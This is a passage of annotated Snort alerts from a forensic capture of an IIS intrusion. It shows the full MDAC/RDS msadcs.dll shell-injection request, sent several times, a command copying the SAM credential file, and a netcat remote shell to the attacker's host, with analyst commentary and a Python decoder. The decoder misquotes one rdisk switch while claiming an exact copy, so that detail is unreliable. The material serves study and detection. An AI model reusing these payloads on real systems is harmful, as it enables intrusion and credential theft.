.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t
.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r..
.m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# The hive files still carry their 11/26/00 timestamps, but the directory itself is now dated 02/04/01 07:05a, system._ has gone from the listing and an 827,392-byte $$hive$$.tmp has appeared: the rdisk started through MDAC is running and rewriting the repair directory.
[**] netcat session 6969 [**]
02/04-06:06:44.136769 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:63357 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF580B Ack: 0x9E4401B8 Win: 0x214E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:05a
...02/04/01 07:05a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:44.663678 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:63613 IpLen:20 DgmLen:624 DF
***AP*** Seq: 0x2CBF58D3 Ack: 0x9E4401B8 Win: 0x214E TcpLen: 20
/01 07:05a 827,392 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..11/26/00 06:43p 14,946 ntuser.da_..11/26
/00 06:43p 4,593 sam._..11/26/00 06:43p
6,066 security._..11/26/00 06:54p 50,4
05 setup.log..11/26/00 06:43p 124,776 software._.
. 11 File(s) 1,046,803 bytes..
1,690,111,488 bytes free....C:\WINNT\repair>..C:\WINNT
\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:47.451806 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64125 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF5B1B Ack: 0x9E4401BD Win: 0x2149 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:05a
...02/04/01 07:05a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:47.988507 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64381 IpLen:20 DgmLen:624 DF
***AP*** Seq: 0x2CBF5BE3 Ack: 0x9E4401BD Win: 0x2149 TcpLen: 20
/01 07:05a 827,392 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..11/26/00 06:43p 14,946 ntuser.da_..11/26
/00 06:43p 4,593 sam._..11/26/00 06:43p
6,066 security._..11/26/00 06:54p 50,4
05 setup.log..11/26/00 06:43p 124,776 software._.
. 11 File(s) 1,046,803 bytes..
1,690,095,104 bytes free....C:\WINNT\repair>..C:\WINNT
\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:50.556251 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:65149 IpLen:20 DgmLen:45 DF
***AP*** Seq: 0x2CBF5E2B Ack: 0x9E4401C2 Win: 0x2144 TcpLen: 20
dir..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:51.090707 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:65405 IpLen:20 DgmLen:819 DF
***AP*** Seq: 0x2CBF5E30 Ack: 0x9E4401C2 Win: 0x2144 TcpLen: 20
Volume in drive C has no label... Volume Serial Number is 8403-
6A0E.... Directory of C:\WINNT\repair....02/04/01 07:05a
...02/04/01 07:05a ....02
/04/01 07:05a 827,392 $$hive$$.tmp..10/13/96 07:
38p 438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677
default._..11/26/00 06:43p 14,946 ntuser.da_..11
/26/00 06:43p 4,593 sam._..11/26/00 06:43p
6,066 security._..11/26/00 06:54p 5
0,405 setup.log..11/26/00 06:43p 124,776 software
._.. 11 File(s) 1,046,803 bytes..
1,690,060,288 bytes free....C:\WINNT\repair>..C:\WI
NNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run rdisk -s/
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:07:04.670041 213.116.251.162:1970 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13616 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB42A3C27 Ack: 0x2CD4DD18 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. .-.s./.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# And again uses MDAC vulnerability to run rdisk -s/
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:07:10.835281 213.116.251.162:1972 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13628 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB443ACC4 Ack: 0x2CD4F531 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. .-.s./.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to try rdisk /s- (the switch rdisk actually expects: update the repair directory, including fresh copies of sam and security, without prompting for a floppy)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:07:32.586022 213.116.251.162:1974 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13640 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB4979F1E Ack: 0x2CD549E2 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. ./.s.-.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:34.978045 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9342 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF613B Ack: 0x9E4401C7 Win: 0x213F TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:06a
...02/04/01 07:06a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# This listing shows rdisk at work rather than the same old timestamps: system._ (02/04/01 07:05a, 177,732 bytes) and ntuser.da_ (07:06a) have been rewritten, $$hive$$.tmp has grown to 3,469,312 bytes, and software._ is missing while it is being regenerated. sam._ and security._ are still the 11/26/00 copies.
[**] netcat session 6969 [**]
02/04-06:07:35.542711 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9598 IpLen:20 DgmLen:622 DF
***AP*** Seq: 0x2CBF6203 Ack: 0x9E4401C7 Win: 0x213F TcpLen: 20
/01 07:05a 3,469,312 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..02/04/01 07:06a 14,946 ntuser.da_..11/26
/00 06:43p 4,593 sam._..11/26/00 06:43p
6,066 security._..11/26/00 06:54p 50,4
05 setup.log..02/04/01 07:05a 177,732 system._..
11 File(s) 3,741,679 bytes..
1,687,127,552 bytes free....C:\WINNT\repair>..C:\WINNT\r
epair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:38.437935 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:10622 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF6449 Ack: 0x9E4401CC Win: 0x213A TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:06a
...02/04/01 07:06a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:38.937066 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:10878 IpLen:20 DgmLen:571 DF
***AP*** Seq: 0x2CBF6511 Ack: 0x9E4401CC Win: 0x213A TcpLen: 20
/01 07:05a 3,469,312 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..11/26/00 06:43p 4,593 sam._..11/26/00
06:43p 6,066 security._..11/26/00 06:54p
50,405 setup.log..02/04/01 07:05a 177,73
2 system._.. 10 File(s) 3,726,733 bytes..
1,687,082,496 bytes free....C:\WINNT\repair
>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to try rdisk /s-
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:07:50.813538 213.116.251.162:1976 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13666 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB4DEEFC4 Ack: 0x2CD59132 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. ./.s.-.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Taken two seconds after the request, this listing still matches the one from 06:07:35: sam._ and security._ are dated 11/26/00 and $$hive$$.tmp is still 3,469,312 bytes.
[**] netcat session 6969 [**]
02/04-06:07:52.003699 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:13950 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF6724 Ack: 0x9E4401D1 Win: 0x2135 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:06a
...02/04/01 07:06a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:52.663693 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:14462 IpLen:20 DgmLen:622 DF
***AP*** Seq: 0x2CBF67EC Ack: 0x9E4401D1 Win: 0x2135 TcpLen: 20
/01 07:05a 3,469,312 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..02/04/01 07:06a 14,946 ntuser.da_..11/26
/00 06:43p 4,593 sam._..11/26/00 06:43p
6,066 security._..11/26/00 06:54p 50,4
05 setup.log..02/04/01 07:05a 177,732 system._..
11 File(s) 3,741,679 bytes..
1,686,932,480 bytes free....C:\WINNT\repair>..C:\WINNT\r
epair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:56.633119 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:14974 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF6A32 Ack: 0x9E4401D6 Win: 0x2130 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:06a
...02/04/01 07:06a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:07:57.165602 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15486 IpLen:20 DgmLen:571 DF
***AP*** Seq: 0x2CBF6AFA Ack: 0x9E4401D6 Win: 0x2130 TcpLen: 20
/01 07:05a 3,469,312 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p 15,677 def
ault._..11/26/00 06:43p 4,593 sam._..11/26/00
06:43p 6,066 security._..11/26/00 06:54p
50,405 setup.log..02/04/01 07:05a 177,73
2 system._.. 10 File(s) 3,726,733 bytes..
1,686,871,552 bytes free....C:\WINNT\repair
>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run rdisk /s-
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:08:32.947786 213.116.251.162:1979 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13695 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB5813614 Ack: 0x2CD635BB Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. ./.s.-.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to copy the compressed sam (c:\winnt\repair\sam._) into the file c:\har.txt. A command run this way executes inside the IIS process with its privileges, which is how the attacker gets round the "Access is denied" the netcat shell received on the same file.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:08:36.838939 213.116.251.162:1981 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13706 IpLen:20 DgmLen:785 DF
***AP*** Seq: 0xB591FFF4 Ack: 0x2CD64506 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 591..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 382..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .t
.y.p.e. .c.:.\.w.i.n.n.t.\.r.e.p.a.i.r.\.s.a.m..._. .>.>.c.:.\.h
.a.r...t.x.t.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A
.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n
.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m
.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
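!@# Added example (mine, not part of the capture or the original notes): every !ADM!ROX!YOUR!WORLD! POST above carries its query as UTF-16LE inside the application/x-varg part, which is why Snort prints it as S.e.l.e.c.t. with a dot standing in for each NUL high byte. The Python below takes the dotted lines exactly as they appear in two of the alerts (the rdisk -/s request and the type sam._ >>c:\har.txt request), recovers the wide string, and pulls out the command handed to shell() and the dbq= path, so the same logic can be run over any msadcs.dll alert. The helper names (decode_wide, parse_rds_post, extract_rds_command) are my own.

```python
"""Added example (not part of the original capture or its analysis): recover
the injected command from a Snort printable dump of an RDS/msadcs.dll POST."""

import re

# The application/x-varg part of two POSTs from the capture above, copied as
# Snort wrapped them (64 columns per line, nothing inserted between lines).
RDISK_POST = r"""
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. .-./.s.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
"""

SAM_COPY_POST = r"""
Length: 382..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .t
.y.p.e. .c.:.\.w.i.n.n.t.\.r.e.p.a.i.r.\.s.a.m..._. .>.>.c.:.\.h
.a.r...t.x.t.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A
.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n
.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m
.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
"""


def decode_wide(dump: str) -> str:
    """Return the UTF-16LE text hidden in a dotted Snort dump.

    Starts at the first letter-dot-letter-dot run and keeps stepping two
    characters at a time while the odd position is still a dot (a NUL).
    The binary length prefix between the VARG arguments decodes as a few
    stray dots, which the regexes in parse_rds_post() simply ignore."""
    joined = "".join(dump.split("\n"))      # Snort wraps without inserting anything
    start = re.search(r"[A-Za-z]\.[A-Za-z]\.", joined)
    if not start:
        return ""
    chars = []
    i = start.start()
    while i + 1 < len(joined) and joined[i + 1] == ".":
        chars.append(joined[i])
        i += 2
    return "".join(chars).rstrip(".")


def parse_rds_post(dump: str) -> dict:
    """Pull out what an analyst wants from an AdvancedDataFactory.Query body:
    the query, the command passed to VBA's shell(), and the dbq= path that
    names the .mdb the Jet engine was pointed at."""
    text = decode_wide(dump)
    query = re.search(r"Select\b.*?\|'", text, re.I)
    shell = re.search(r'shell\("(.*?)"\)', text, re.I)
    dbq = re.search(r"dbq=([^;]+);", text, re.I)
    return {
        "query": query.group(0) if query else "",
        "command": shell.group(1) if shell else "",
        "dbq": dbq.group(1) if dbq else "",
        "injection": shell is not None,
    }


def extract_rds_command(dump: str) -> str:
    """Just the operating-system command the POST was built to run."""
    return parse_rds_post(dump)["command"]


if __name__ == "__main__":
    for label, dump in (("rdisk", RDISK_POST), ("sam copy", SAM_COPY_POST)):
        info = parse_rds_post(dump)
        print(f"{label}: shell() -> {info['command']!r}  via dbq={info['dbq']}")
```

!@# The dbq= value is worth keeping in the output: btcustmr.mdb is the sample database shipped with the IIS tutorial, and its presence on a production server is what made this request succeed.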
[**] netcat session 6969 [**]
02/04-06:08:41.269150 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:22142 IpLen:20 DgmLen:80 DF
***AP*** Seq: 0x2CBF6D0D Ack: 0x9E4401DA Win: 0x212C TcpLen: 20
c:....C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# A directory listing shows that rdisk /s- has finished: default._, ntuser.da_, sam._, security._ and software._ are all dated 02/04/01 07:07a, and sam._ has grown from 4,593 to 5,327 bytes. The file times run about an hour ahead of the sensor's packet timestamps throughout this session (06:06 on the sensor matched 07:05a on the host), so the two clocks differ by a constant offset; nothing here suggests the host clock is jumping around.
[**] netcat session 6969 [**]
02/04-06:08:42.109830 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:22654 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF6D35 Ack: 0x9E4401DF Win: 0x2127 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....02/04/01 07:07a
...02/04/01 07:07a .
...02/04
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:42.645452 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:22910 IpLen:20 DgmLen:624 DF
***AP*** Seq: 0x2CBF6DFD Ack: 0x9E4401DF Win: 0x2127 TcpLen: 20
/01 07:07a 827,392 $$hive$$.tmp..10/13/96 07:38p
438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..02/04/01 07:07a 16,275 def
ault._..02/04/01 07:07a 14,946 ntuser.da_..02/04
/01 07:07a 5,327 sam._..02/04/01 07:07a
10,111 security._..11/26/00 06:54p 50,4
05 setup.log..02/04/01 07:07a 686,053 software._.
. 11 File(s) 1,613,457 bytes..
1,689,496,576 bytes free....C:\WINNT\repair>..C:\WINNT
\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:44.005648 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23422 IpLen:20 DgmLen:45 DF
***AP*** Seq: 0x2CBF7045 Ack: 0x9E4401E4 Win: 0x2122 TcpLen: 20
cd\..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:44.542113 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23678 IpLen:20 DgmLen:52 DF
***AP*** Seq: 0x2CBF704A Ack: 0x9E4401E4 Win: 0x2122 TcpLen: 20
..C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:45.394693 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:24190 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF7056 Ack: 0x9E4401E9 Win: 0x211D TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:45.943309 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:24446 IpLen:20 DgmLen:807 DF
***AP*** Seq: 0x2CBF711E Ack: 0x9E4401E9 Win: 0x211D TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..02/04/01 07:07a
5,327 har.txt..12/07/00 03:30p InetP
ub..12/07/00 03:12p Multimedia Files..12/
26/00 07:10p New Folder..01/26/01 02:10p
78,643,200 pagefile.sys..12/21/00 08:59p Program Files..02/04/01 06:49a 6
9 README.NOW.Hax0r..12/21/00 08:59p TEMP.
.02/04/01 07:05a WINNT..12/26/00 07:09p
wiretrip..02/04/01 06:43a
0 yay.txt.. 15 File(s) 78,648,918 bytes..
1,689,455,616 bytes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
